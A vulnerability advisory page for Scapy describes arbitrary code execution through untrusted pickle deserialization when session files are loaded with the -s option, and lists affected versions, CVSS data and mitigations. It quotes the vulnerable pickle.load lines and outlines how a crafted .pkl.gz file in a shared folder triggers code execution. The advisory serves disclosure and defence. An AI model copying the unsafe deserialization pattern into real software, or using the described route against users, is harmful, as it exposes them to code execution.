GHSA-cq46-m9x9-j8w2

Suggest an improvement
Source
https://github.com/advisories/GHSA-cq46-m9x9-j8w2
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-cq46-m9x9-j8w2
Published
2025-10-22T16:45:49Z
Modified
2025-10-23T20:17:37.620579Z
Severity
  • 5.4 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization
Details

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.

Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py
SESSION = pickle.load(gzip.open(session_name, "rb"))

Since no validation or restriction is performed on the deserialized object, any code embedded via __reduce__() will be executed immediately. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try:
    s = pickle.load(gzip.open(fname, "rb"))
except IOError:
    try:
        s = pickle.load(open(fname, "rb"))

Impact

This is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected version: Scapy v2.6.1

Mitigations

  • Do not use 'sessions' (the -s option when launching Scapy).
  • Use the Scapy 2.7.0+ where the session mechanism has been removed.
Database specific 
{
    "github_reviewed": true,
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-502"
    ],
    "github_reviewed_at": "2025-10-22T16:45:49Z",
    "severity": "MODERATE"
}
References

Affected packages

PyPI / scapy

Package

Name
scapy
View open source insights on deps.dev
Purl
pkg:pypi/scapy

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
2.6.1

Affected versions

2.*
2.2.0-dev
2.3.1
2.3.2
2.3.3
2.4rc2
2.4.0rc3
2.4.0rc4
2.4.0rc5
2.4.0
2.4.1
2.4.2
2.4.3rc1
2.4.3rc2
2.4.3rc3
2.4.3rc4
2.4.3
2.4.4rc1
2.4.4rc2
2.4.4
2.4.5rc1
2.4.5
2.5.0rc1
2.5.0rc2
2.5.0rc3
2.5.0
2.6.0rc1
2.6.0rc2
2.6.0
2.6.1

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json"